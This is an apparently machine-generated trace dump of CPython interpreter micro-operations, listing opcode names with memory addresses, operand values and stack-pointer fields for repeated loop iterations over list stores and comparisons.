9223372036854775804 2645304352192 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352256 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352192 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352128 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351984 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352048 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352112 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 21 140702510881792 9223372036854775804 2645304352272 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352192 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352256 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352320 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352256 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352320 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352256 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352192 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352048 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352112 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352176 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 22 140702510881792 9223372036854775804 2645304352336 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352256 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352320 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352384 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352320 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352384 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352320 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352256 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352112 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352176 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352240 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 23 140702510881792 9223372036854775804 2645304352400 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352320 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352384 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352448 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352384 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352448 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352384 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352320 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352176 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352240 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352304 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 24 140702510881792 9223372036854775804 2645304352464 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352384 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352448 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352512 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352448 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352512 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352448 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352384 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352240 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352304 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352368 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 25 140702510881792 9223372036854775804 2645304352528 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352448 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352512 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352576 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352512 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352576 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352512 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352448 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352304 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352368 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352432 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 26 140702510881792 9223372036854775804 2645304352592 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352512 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352576 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352640 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352576 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352640 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352576 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352512 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352368 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352432 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352496 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 27 140702510881792 9223372036854775804 2645304352656 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352640 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352704 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352640 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352704 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352640 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352576 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352432 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352496 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352560 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 28 140702510881792 9223372036854775804 2645304352720 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352640 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352704 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 127 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352704 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 127 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352704 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352640 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352496 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352560 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352624 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 29 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352704 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361312 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 127 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304361312 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 127 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352704 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352560 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352624 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352688 65535 _LOAD_CONST sp=65535 0 2 9223372036854775804 2645304350576 65535 _STORE_NAME sp=65535 2 140702510881992 140702510944352 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 92 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352752 65535 _LOAD_NAME sp=65535 0 140702510881680 1 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 0 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361392 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 0 140702510881776 9223372036854775804 2645304361392 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304361392 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361456 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304361392 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361312 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304361376 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 1 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361520 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 1 140702510881776 9223372036854775804 2645304361520 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304361520 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361584 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304361520 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361440 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304361504 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 2 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361648 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 2 140702510881776 9223372036854775804 2645304361648 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304361648 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361712 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304361648 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361568 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304361632 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 3 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361776 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 3 140702510881776 9223372036854775804 2645304361776 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304361776 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361840 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304361776 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361696 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304361760 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 4 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361904 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 4 140702510881776 9223372036854775804 2645304361904 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304361904 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304361968 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304361904 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361824 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304361888 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 5 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362032 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 5 140702510881776 9223372036854775804 2645304362032 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362032 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362096 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362032 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304361952 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362016 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 6 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362160 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 6 140702510881776 9223372036854775804 2645304362160 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362160 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362224 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362160 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362080 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362144 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 7 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362288 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 7 140702510881776 9223372036854775804 2645304362288 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362288 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362352 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362288 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362208 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 